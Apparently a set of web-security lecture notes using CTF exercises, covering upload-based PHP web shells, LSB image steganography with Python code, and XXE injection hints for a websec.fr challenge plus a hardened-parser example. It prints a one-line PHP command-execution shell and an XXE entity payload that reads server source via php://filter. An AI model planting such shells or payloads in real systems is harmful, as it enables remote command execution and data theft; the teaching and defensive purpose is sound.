7 lectures left this semester and here are things I would regret NOT teaching you but don't really want to spend a whole lecture on.
So as a concept: if you are able to upload a photo to a server, it has to land somewhere on disk. If you can work out where it lands, does that get you something?
Get the flag and pop a reverse shell at: https://fuecakes.herokuapp.com/
<?php
echo system($_GET["cmd"]);
?>
This pops up a lot in CTFs, mostly because it's a fun concept to wrap your head around. In the context of a kill chain this would be expected on the exfiltration side of the house, but what do I know, I just like cool puzzles.
The big idea is this: a pixel typically contains 1, 3 or 4 values: a single brightness (white/grayscale) value; Red, Green, Blue; or Red, Green, Blue, Alpha, each stored as one byte (0-255).
So imagine you have an image on the internet which is a big red square: (255, 0, 0) for every pixel:

Would you be able to visually distinguish it from (254, 0, 0)?

If we don't think it's detectable, we could hide messages in those insignificant (least significant) bits, and they would be hard to notice:
Find the flag in the following version:

If you'd like, here is the Python for how I made those 3 images; it's also just a useful thing to be able to do:
Some other concepts near LSB:

Take this image (leo.png) over to https://georgeom.net/StegOnline/upload and upload it. Then click the LSB-Half button.
While you're at it, inspect the bit planes of flaghere.png to see the artifacting.
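The mechanics behind the red-square images and the bit-plane inspection, as an added example (this is not the Python the lecture refers to above): the image is a constructed in-memory 16x16 grid of (R, G, B) tuples so no image library is needed, the payload is hidden in the least significant bit of each channel in raster order, and the 2-byte length prefix is this example's own framing so the extractor knows where to stop. `bit_plane` produces the same 0/1 view a bit-plane browser shows, and `max_channel_delta` confirms no channel moved by more than 1, which is why (255, 0, 0) and (254, 0, 0) are visually indistinguishable yet leak a whole message.

```python
"""LSB steganography on an in-memory RGB image (constructed example, no image library needed)."""

# Constructed 16x16 "big red square": rows of (r, g, b) tuples, each channel 0-255.
WIDTH, HEIGHT = 16, 16


def red_square(width=WIDTH, height=HEIGHT):
    return [[(255, 0, 0)] * width for _ in range(height)]


def _bits(data):
    # Yield the bits of each byte, most significant bit first.
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def embed_lsb(image, payload):
    """Return a copy of image with payload in the LSB of R, G, B in raster order.
    A 2-byte big-endian length prefix (this example's own framing) tells the extractor where to stop."""
    framed = len(payload).to_bytes(2, "big") + payload
    bits = list(_bits(framed))
    capacity = len(image) * len(image[0]) * 3
    if len(bits) > capacity:
        raise ValueError(f"payload needs {len(bits)} bits, image holds {capacity}")
    out = [list(row) for row in image]
    idx = 0
    for row in out:
        for x, (r, g, b) in enumerate(row):
            if idx >= len(bits):
                return out
            channels = [r, g, b]
            for c in range(3):
                if idx < len(bits):
                    channels[c] = (channels[c] & 0xFE) | bits[idx]  # clear LSB, write payload bit
                    idx += 1
            row[x] = tuple(channels)
    return out


def extract_lsb(image):
    """Read the LSB stream back and return the payload framed by embed_lsb."""
    bits = [channel & 1 for row in image for px in row for channel in px[:3]]

    def take(nbytes, offset):
        out = bytearray()
        for i in range(nbytes):
            value = 0
            for j in range(8):
                value = (value << 1) | bits[offset + i * 8 + j]
            out.append(value)
        return bytes(out)

    length = int.from_bytes(take(2, 0), "big")
    if 16 + length * 8 > len(bits):
        raise ValueError("length prefix exceeds image capacity: not a payload in this framing")
    return take(length, 16)


def bit_plane(image, channel, bit):
    """0/1 view of one bit of one channel per pixel, the same thing a bit-plane browser renders."""
    return [[(px[channel] >> bit) & 1 for px in row] for row in image]


def max_channel_delta(original, modified):
    """Largest per-channel change between two same-sized images; LSB embedding never exceeds 1."""
    return max(abs(a - b)
               for row_o, row_m in zip(original, modified)
               for px_o, px_m in zip(row_o, row_m)
               for a, b in zip(px_o, px_m))


if __name__ == "__main__":
    cover = red_square()
    stego = embed_lsb(cover, b"flag{constructed}")  # constructed flag, not the lecture's
    print("recovered:", extract_lsb(stego))
    print("max channel change:", max_channel_delta(cover, stego))
    print("LSB plane of red, first row:", bit_plane(stego, 0, 0)[0])
```

Comparing `bit_plane(stego, 0, 0)` against the cover's all-ones plane is the cheap forensic check: a flat region whose LSB plane suddenly looks like noise for the first N pixels and then goes uniform again is the artifacting the flaghere.png exercise asks you to look for.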
OK I want to introduce: https://websec.fr/ a great collection of direct websec exploits.
This one is level 12.
It is more common than it seems. If you can upload any kind of XML (which includes HTML) and a security setting isn't turned on, you can craft a malicious payload that loads external files. From there you can comb around looking for interesting stuff. (You can also, occasionally, import external URLs, allowing command and control!)
Let's look at the following writeup: https://medium.com/bugbountywriteup/devoops-an-xml-external-entity-xxe-hackthebox-walkthrough-fb5ba03aaaa2
Now here are some sample payloads:
OK let's go. Try websec.fr problem 12. Here are some hints:
Use SimpleXMLElement as the class name and number values (0,1,2,...) for param 2. For param 1, try something like:
<!DOCTYPE foo [<!ENTITY hi "yoyoyo">]><foo>&hi;</foo> (which integer works for this payload?). Now replace <!ENTITY hi "yoyoyo"> with something like
<!ENTITY hi SYSTEM "php://filter/convert.base64-encode/resource=index.php"> and find an integer value that shows the source code (in base64). Hunt for a payload that solves the problem.
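Why the "yoyoyo" hint works, and what the fix looks like on the server side, as an added example (Python's stdlib expat binding, not the websec.fr challenge or its PHP): the permissive parser resolves the internal entity and hands its replacement text back as content, which is the same resolution step the SYSTEM variant turns into a file read. The hardened path is two layers, a pre-parse guard that flags any DOCTYPE or ENTITY declaration in an upload (usable as a detection rule over request bodies too) and a parser that aborts on the first such declaration and refuses to fetch externals. The upload bytes are constructed here and only use the harmless internal-entity form.

```python
"""XXE from the defender's side: a parser that expands entities vs one that refuses any DTD."""
import re
import xml.parsers.expat

# Constructed uploads: the internal-entity form of the hint payload, and a plain document.
UPLOAD_WITH_DTD = b'<!DOCTYPE foo [<!ENTITY hi "yoyoyo">]><foo>&hi;</foo>'
UPLOAD_PLAIN = b"<foo>hi</foo>"


class DtdRejected(ValueError):
    """Raised when uploaded XML carries a DOCTYPE or entity declaration."""


def looks_like_dtd(data: bytes) -> bool:
    """Cheap pre-parse guard for an upload handler or a request-body detection rule.
    XML keywords are case-sensitive; matching loosely costs nothing and catches sloppy variants."""
    return re.search(rb"<!\s*(DOCTYPE|ENTITY)\b", data, re.IGNORECASE) is not None


def parse_text_content(data: bytes) -> str:
    """Permissive path: expat resolves the internal entity and returns its replacement text."""
    chunks = []
    parser = xml.parsers.expat.ParserCreate()
    parser.CharacterDataHandler = chunks.append
    parser.Parse(data, True)
    return "".join(chunks)


def safe_parse_text_content(data: bytes) -> str:
    """Hardened path: abort at the first DOCTYPE or entity declaration; never load externals."""
    chunks = []
    parser = xml.parsers.expat.ParserCreate()

    def reject(*_handler_args):
        raise DtdRejected("DOCTYPE/ENTITY declarations are not accepted in uploaded XML")

    parser.StartDoctypeDeclHandler = reject
    parser.EntityDeclHandler = reject
    # Returning 0 from this handler makes expat fail the parse instead of fetching the entity.
    parser.ExternalEntityRefHandler = lambda *_args: 0
    parser.CharacterDataHandler = chunks.append
    parser.Parse(data, True)
    return "".join(chunks)


def is_rejected(data: bytes) -> bool:
    """True when the hardened parser refuses the document."""
    try:
        safe_parse_text_content(data)
    except DtdRejected:
        return True
    return False


if __name__ == "__main__":
    print("permissive parser sees:", parse_text_content(UPLOAD_WITH_DTD))
    print("pre-parse guard flags upload:", looks_like_dtd(UPLOAD_WITH_DTD))
    print("hardened parser rejects upload:", is_rejected(UPLOAD_WITH_DTD))
    print("hardened parser still reads plain XML:", safe_parse_text_content(UPLOAD_PLAIN))
```

The lesson carries over to the PHP side of the challenge: whichever integer makes SimpleXMLElement expand entities is the setting the hardened path must never enable on untrusted input, and an upload handler that rejects DOCTYPE outright removes the whole class rather than one payload.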